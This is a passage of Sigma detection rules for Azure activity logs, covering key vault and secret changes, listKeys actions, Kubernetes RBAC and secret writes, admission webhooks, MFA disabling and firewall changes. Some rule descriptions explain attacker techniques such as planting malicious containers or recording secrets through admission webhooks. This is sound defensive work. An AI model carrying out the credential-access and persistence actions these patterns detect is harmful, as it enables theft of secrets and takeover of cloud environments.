references: - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml author: sawwinnnaung date: 2020-05-07 modified: 2023-10-11 tags: - attack.privilege-escalation - attack.persistence - attack.t1098.003 logsource: product: azure service: activitylogs detection: keywords: - Microsoft.Authorization/roleAssignments/write condition: keywords falsepositives: - Valid change level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml ================================================ title: Azure Keyvault Key Modified or Deleted id: 80eeab92-0979-4152-942d-96749e11df40 status: test description: Identifies when a Keyvault Key is modified or deleted in Azure. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-16 modified: 2022-08-23 tags: - attack.impact - attack.credential-access - attack.t1552 - attack.t1552.001 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION condition: selection falsepositives: - Key being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml ================================================ title: Azure Key Vault Modified or Deleted id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d status: test description: Identifies when a key vault is modified or deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-16 modified: 2022-08-23 tags: - attack.impact - attack.credential-access - attack.t1552 - attack.t1552.001 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KEYVAULT/VAULTS/WRITE - MICROSOFT.KEYVAULT/VAULTS/DELETE - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE condition: selection falsepositives: - Key Vault being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml ================================================ title: Azure Keyvault Secrets Modified or Deleted id: b831353c-1971-477b-abb6-2828edc3bca1 status: test description: Identifies when secrets are modified or deleted in Azure. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-16 modified: 2022-08-23 tags: - attack.impact - attack.credential-access - attack.t1552 - attack.t1552.001 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION condition: selection falsepositives: - Secrets being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml ================================================ title: Azure Kubernetes Admission Controller id: a61a3c56-4ce2-4351-a079-88ae4cbd2b58 status: test description: | Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. 
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes author: Austin Songer @austinsonger date: 2021-11-25 modified: 2022-12-18 tags: - attack.privilege-escalation - attack.initial-access - attack.defense-evasion - attack.persistence - attack.t1078 - attack.credential-access - attack.t1552 - attack.t1552.007 logsource: product: azure service: activitylogs detection: selection: operationName|startswith: - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO' - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO' operationName|endswith: - '/MUTATINGWEBHOOKCONFIGURATIONS/WRITE' - '/VALIDATINGWEBHOOKCONFIGURATIONS/WRITE' condition: selection falsepositives: - Azure Kubernetes Admissions Controller may be done by a system administrator. - If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml ================================================ title: Azure Kubernetes Cluster Created or Deleted id: 9541f321-7cba-4b43-80fc-fbd1fb922808 status: test description: Detects when an Azure Kubernetes Cluster is created or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE condition: selection falsepositives: - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml ================================================ title: Azure Kubernetes CronJob id: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a status: test description: | Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ - https://kubernetes.io/docs/concepts/workloads/controllers/job/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ author: Austin Songer @austinsonger date: 2021-11-22 modified: 2022-12-18 tags: - attack.persistence - attack.t1053.003 - attack.privilege-escalation - attack.execution logsource: product: azure service: activitylogs detection: selection: operationName|startswith: - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH' - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH' operationName|endswith: - '/CRONJOBS/WRITE' - '/JOBS/WRITE' condition: selection falsepositives: - Azure Kubernetes CronJob/Job may be done by a system administrator. - If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml ================================================ title: Azure Kubernetes Events Deleted id: 225d8b09-e714-479c-a0e4-55e6f29adf35 status: test description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml author: Austin Songer @austinsonger date: 2021-07-24 modified: 2022-08-23 tags: - attack.defense-evasion - attack.t1562 - attack.t1562.001 logsource: product: azure service: activitylogs detection: selection: operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE condition: selection falsepositives: - Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Event deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml ================================================ title: Azure Kubernetes Network Policy Change id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43 status: test description: Identifies when an Azure Kubernetes network policy is modified or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.credential-access - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE condition: selection falsepositives: - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml ================================================ title: Azure Kubernetes Pods Deleted id: b02f9591-12c3-4965-986a-88028629b2e1 status: test description: Identifies the deletion of Azure Kubernetes Pods. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml author: Austin Songer @austinsonger date: 2021-07-24 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE condition: selection falsepositives: - Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml ================================================ title: Azure Kubernetes Sensitive Role Access id: 818fee0c-e0ec-4e45-824e-83e4817b0887 status: test description: Identifies when ClusterRoles/Roles are being modified or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION condition: selection falsepositives: - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml ================================================ title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 status: test description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.credential-access - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE condition: selection falsepositives: - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml ================================================ title: Azure Kubernetes Secret or Config Object Access id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c status: test description: Identifies when a Kubernetes account accesses sensitive objects such as configmaps or secrets. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE condition: selection falsepositives: - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml ================================================ title: Azure Kubernetes Service Account Modified or Deleted id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 status: test description: Identifies when a service account is modified or deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.t1531 - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION condition: selection falsepositives: - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_mfa_disabled.yml ================================================ title: Disabled MFA to Bypass Authentication Mechanisms id: 7ea78478-a4f9-42a6-9dcd-f861816122bf status: test description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. references: - https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates author: '@ionsor' date: 2022-02-08 tags: - attack.defense-evasion - attack.credential-access - attack.persistence - attack.t1556 logsource: product: azure service: activitylogs detection: selection: eventSource: AzureActiveDirectory eventName: 'Disable Strong Authentication.' status: success condition: selection falsepositives: - Authorized modification by administrators level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml ================================================ title: Azure Network Firewall Policy Modified or Deleted id: 83c17918-746e-4bd9-920b-8e098bf88c23 status: test description: Identifies when a Firewall Policy is Modified or Deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-09-02 modified: 2022-08-23 tags: - attack.impact - attack.defense-evasion - attack.t1562.007 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE condition: selection falsepositives: - Firewall Policy being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml ================================================ title: Azure Firewall Rule Configuration Modified or Deleted id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 status: test description: Identifies when a Firewall Rule Configuration is Modified or Deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE condition: selection falsepositives: - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml ================================================ title: Azure Point-to-site VPN Modified or Deleted id: d9557b75-267b-4b43-922f-a775e2d1f792 status: test description: Identifies when a Point-to-site VPN is Modified or Deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection falsepositives: - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml ================================================ title: Azure Network Security Configuration Modified or Deleted id: d22b4df4-5a67-4859-a578-8c9a0b5af9df status: test description: Identifies when a network security configuration is modified or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection falsepositives: - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml ================================================ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 status: test description: | Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE condition: selection falsepositives: - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml ================================================ title: Azure New CloudShell Created id: 72af37e2-ec32-47dc-992b-bc288a2708cb status: test description: Identifies when a new cloudshell is created inside of Azure portal. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer date: 2021-09-21 modified: 2022-08-23 tags: - attack.execution - attack.t1059 logsource: product: azure service: activitylogs detection: selection: operationName: MICROSOFT.PORTAL/CONSOLES/WRITE condition: selection falsepositives: - A new cloudshell may be created by a system administrator. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml ================================================ title: Azure Owner Removed From Application or Service Principal id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 status: test description: Identifies when an owner was removed from an application or service principal in Azure. references: - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy author: Austin Songer @austinsonger date: 2021-09-03 modified: 2022-10-09 tags: - attack.defense-evasion logsource: product: azure service: activitylogs detection: selection: properties.message: - Remove owner from service principal - Remove owner from application condition: selection falsepositives: - Owner being removed may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_rare_operations.yml ================================================ title: Rare Subscription-level Operations In Azure id: c1182e02-49a3-481c-b3de-0fadc4091488 status: test description: Identifies rare subscription-level operations in Azure, such as listing account keys, writing snapshots, or modifying network security groups. references: - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml author: sawwinnnaung date: 2020-05-07 modified: 2023-10-11 tags: - attack.t1003 - attack.credential-access logsource: product: azure service: activitylogs detection: keywords: - Microsoft.DocumentDB/databaseAccounts/listKeys/action - Microsoft.Maps/accounts/listKeys/action - Microsoft.Media/mediaservices/listKeys/action - Microsoft.CognitiveServices/accounts/listKeys/action - Microsoft.Storage/storageAccounts/listKeys/action - Microsoft.Compute/snapshots/write - Microsoft.Network/networkSecurityGroups/write condition: keywords falsepositives: - Valid change level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_service_principal_created.yml ================================================ title: Azure Service Principal Created id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 status: test description: Identifies when a service principal is created in Azure. references: - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy author: Austin Songer @austinsonger date: 2021-09-02 modified: 2022-10-09 tags: - attack.defense-evasion logsource: product: azure service: activitylogs detection: selection: properties.message: 'Add service principal' condition: selection falsepositives: - Service principal being created may be performed by a system administrator. 
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_service_principal_removed.yml ================================================ title: Azure Service Principal Removed id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 status: test description: Identifies when a service principal was removed in Azure. references: - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy author: Austin Songer @austinsonger date: 2021-09-03 modified: 2022-10-09 tags: - attack.defense-evasion logsource: product: azure service: activitylogs detection: selection: properties.message: Remove service principal condition: selection falsepositives: - Service principal being removed may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml ================================================ title: Azure Subscription Permission Elevation Via ActivityLogs id: 09438caa-07b1-4870-8405-1dbafe3dad95 status: test description: | Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. 
